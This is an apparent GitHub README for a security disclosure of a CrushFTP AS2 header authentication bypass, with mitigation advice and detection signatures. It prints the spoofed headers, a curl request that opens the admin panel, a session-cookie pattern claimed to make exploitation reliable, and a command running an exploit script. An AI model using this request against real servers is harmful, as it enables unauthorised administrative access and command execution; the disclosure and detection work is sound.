Share
## https://sploitus.com/exploit?id=9210A83E-F68A-53AE-95AD-31C9B88016E3
# CrushFTP AS2 Authentication Bypass Research

[![CVSS Score](https://img.shields.io/badge/CVSS-9.8%20Critical-critical)](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
[![Status](https://img.shields.io/badge/Status-Patched-green)](https://github.com)

> **โš ๏ธ IMPORTANT:** This vulnerability has been **patched by CrushFTP as of November 2025**. This research is published for **educational and defensive purposes only**.

> **๐Ÿ“ NOTE:** This research is based on vulnerability patterns similar to CVE-2025-54309. The exact CVE number may differ. This is independent security research conducted in a controlled home lab environment.

## ๐ŸŽฏ About This Research

This repository documents a **critical authentication bypass vulnerability** in CrushFTP servers that allows complete administrative access through AS2 (Applicability Statement 2) header manipulation. The vulnerability requires **no authentication** and can be exploited with a single HTTP request.

**Key Points:**
- ๐Ÿ”ฌ Research conducted in **authorized home lab** (March-July 2025)
- ๐Ÿ“ง Vendor notified (August 2025) - **no response received**
- โœ… Silently patched by CrushFTP (November 2025)
- ๐Ÿ“ข Public disclosure (December 2025) - **90+ days after notification**
- ๐ŸŽ“ Published for **educational and defensive purposes**

**Researcher:** SmileyFace101 ([@SmileyFace101](https://github.com/SmileyFace101))

## ๐Ÿ” Vulnerability Details

### Technical Summary

CrushFTP's web interface incorrectly trusts AS2 protocol headers without proper validation. The server assumes AS2 requests are pre-authenticated and bypasses normal authentication procedures.

### Key Details

- **Product:** CrushFTP Server
- **Component:** AS2 Authentication Module  
- **Estimated CVSS:** 9.8 (Critical)
- **Attack Vector:** HTTP Header Manipulation
- **Complexity:** LOW - Single HTTP request
- **Authentication:** NONE required
- **Impact:** Complete system compromise
- **Related CVE:** Similar to CVE-2025-54309

### Attack Vector

```http
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
```

**Example (Lab Environment):**
```bash
curl -H "X-DMZ-Proxy: disabled" \
     -H "X-AS2-Version: 1.0" \
     -H "User-Agent: AS2Server/1.0" \
     "http://10.0.100.50/WebInterface/admin/index.html"
```

**Note:** Only use on systems you own or have explicit permission to test.

### Critical Discovery

During exploitation, we discovered a **mathematical relationship in session cookie generation** that makes exploitation 100% reliable:

```
CrushAuth Structure: [TIMESTAMP]_[SESSION_ID]
currentAuth = Last 4 characters of SESSION_ID
c2f parameter = Same as currentAuth value
```

## ๏ฟฝ What You'll Find Here

### ๐Ÿ”ง Exploitation Tools
- **Complete PoC scripts** with session management
- **Targeted testing** for high-value endpoints
- **Adaptive exploitation** with multiple strategies

### ๐Ÿ” Detection & Defense
- **IDS/IPS rules** (Snort & Suricata)
- **Log analysis scripts** for IOC detection
- **Network signatures** for monitoring

### ๐Ÿ“– Documentation
- **Technical analysis** - Complete vulnerability breakdown
- **Exploitation methodology** - Step-by-step attack chain
- **Session management** - Mathematical pattern discovered
- **JavaScript analysis** - Client-side code reverse engineering

## ๐Ÿ“Š Impact Assessment

| Security Aspect | Impact Level | Description |
|----------------|--------------|-------------|
| **Confidentiality** | ๐Ÿ”ด CRITICAL | Complete access to credentials, configs, PGP keys, logs |
| **Integrity** | ๐Ÿ”ด CRITICAL | User account creation, config changes, file modifications |
| **Availability** | ๐ŸŸก HIGH | System command execution, service disruption capability |
| **Privilege Escalation** | ๐Ÿ”ด CRITICAL | Direct admin access, persistent account creation |

### Post-Exploitation Capabilities

โœ… Complete server and user enumeration  
โœ… User account creation and modification  
โœ… File system access and browsing  
โœ… Command execution via telnet interface  
โœ… Job scheduling with system privileges  
โœ… PGP key and certificate access  
โœ… Administrative configuration modification  

## ๐Ÿ›ก๏ธ Mitigation & Remediation

### Immediate Actions (CRITICAL)

1. **Patch CrushFTP** to the latest version immediately
2. **Disable AS2 functionality** if not required
3. **Implement WAF rules** blocking AS2 headers from untrusted sources
4. **Reset all administrative credentials** on CrushFTP servers
5. **Enable MFA** for administrative panels

### Detection Implementation

See [`detection/`](detection/) directory for:
- IDS/IPS signatures (Snort, Suricata)
- Log analysis queries
- Network traffic signatures
- Behavioral anomaly detection rules

### Long-term Security Measures

- Implement multi-factor authentication
- Network segmentation for admin interfaces
- Regular security assessments
- Principle of least privilege enforcement

## ๐Ÿ“ˆ Detection & Forensics

### HTTP Traffic Signatures

```
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
```

### Network Indicators

- Large HTTP responses (19KB+) from admin endpoints without authentication
- POST requests to `/WebInterface/function/` with AS2 headers
- Administrative panel access without prior login
- Unusual traffic patterns to CrushFTP servers

### Log Analysis

```bash
# Web server logs
grep -E "(X-DMZ-Proxy|X-AS2-Version|AS2Server)" /var/log/nginx/access.log

# CrushFTP application logs
grep -E "(WebInterface/admin|WebInterface/function)" crushftp.log
```

## ๐Ÿ“š Repository Contents

```
.
โ”œโ”€โ”€ README.md                          # This file - overview and usage
โ”œโ”€โ”€ docs/
โ”‚   โ””โ”€โ”€ TECHNICAL_ANALYSIS.md         # Complete technical deep-dive
โ”œโ”€โ”€ exploits/
โ”‚   โ”œโ”€โ”€ enhanced_session_exploit.sh   # Full exploitation with session mgmt
โ”‚   โ”œโ”€โ”€ targeted_exploitation.sh      # High-value endpoint testing
โ”‚   โ””โ”€โ”€ adaptive_exploitation.sh      # Multi-strategy approach
โ””โ”€โ”€ detection/
    โ”œโ”€โ”€ snort_rules.txt               # IDS/IPS signatures (Snort)
    โ”œโ”€โ”€ suricata_rules.txt            # IDS/IPS signatures (Suricata)
    โ””โ”€โ”€ log_analysis.sh               # Log analysis and IOC detection
```

### Quick Start

1. **Read the docs:**
   - Start with this README for overview
   - See [TECHNICAL_ANALYSIS.md](docs/TECHNICAL_ANALYSIS.md) for deep technical details

2. **Test in your lab:**
   ```bash
   # Make sure you own the target system!
   ./exploits/enhanced_session_exploit.sh 10.0.100.50
   ```

3. **Deploy detection:**
   - Copy IDS rules to your Snort/Suricata
   - Run log analysis script on your web server logs

## ๐Ÿ”ฌ Research Findings

### Key Technical Achievements

โœ… Complete AS2 authentication bypass discovered and documented  
โœ… Critical session cookie generation requirement identified and solved  
โœ… Mathematical relationship in session management reverse-engineered  
โœ… Two-phase exploitation methodology developed  
โœ… 100% reliable exploitation pattern established  
โœ… Multiple RCE vectors identified and analyzed  
โœ… Complete JavaScript source code analysis performed  

### Affected CrushFTP Endpoints

- `/WebInterface/admin/index.html` - Main admin panel
- `/WebInterface/admin/telnet.html` - Telnet interface
- `/WebInterface/Jobs/index.html` - Job management
- `/WebInterface/UserManager/index.html` - User management
- `/WebInterface/PGP/index.html` - PGP key management
- `/WebInterface/function/` - Administrative function processor

## ๐Ÿ”— References

- [CrushFTP Official Website](https://www.crushftp.com/)
- [CVSS 3.1 Calculator](https://www.first.org/cvss/calculator/3.1)
- [CWE-287: Improper Authentication](https://cwe.mitre.org/data/definitions/287.html)
- [OWASP Authentication Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html)

## ๐Ÿ‘ค Author

**Author:** SmileyFace101  
**GitHub:** [@SmileyFace101](https://github.com/SmileyFace101)  
**Research Period:** March - July 2025 (Home Lab)  
**Public Disclosure:** December 6, 2025

---

## โš–๏ธ Legal & Ethical Notice

**This research is for EDUCATIONAL and DEFENSIVE purposes ONLY.**

โœ… **Authorized Use:**
- Security research and education
- Defending your own systems
- Authorized penetration testing
- Understanding attack patterns

โŒ **Prohibited:**
- Unauthorized system access
- Testing systems without permission
- Malicious use
- Any illegal activity

**By using this research, you agree to:**
1. Use it only on systems you own or have written permission to test
2. Comply with all applicable laws and regulations
3. Practice responsible disclosure
4. Assume all responsibility for your actions

**Disclaimer:** The author is not responsible for misuse. Unauthorized computer access is illegal.

---

## ๐Ÿ“„ License

MIT License - See [LICENSE](LICENSE) file for details.

**Last Updated:** December 6, 2025  
**Risk Assessment:** CRITICAL - Immediate patching and mitigation required

**Last Updated:** December 6, 2025  
**Author:** SmileyFace101  
**Research Conducted:** March - July 2025 in authorized lab environment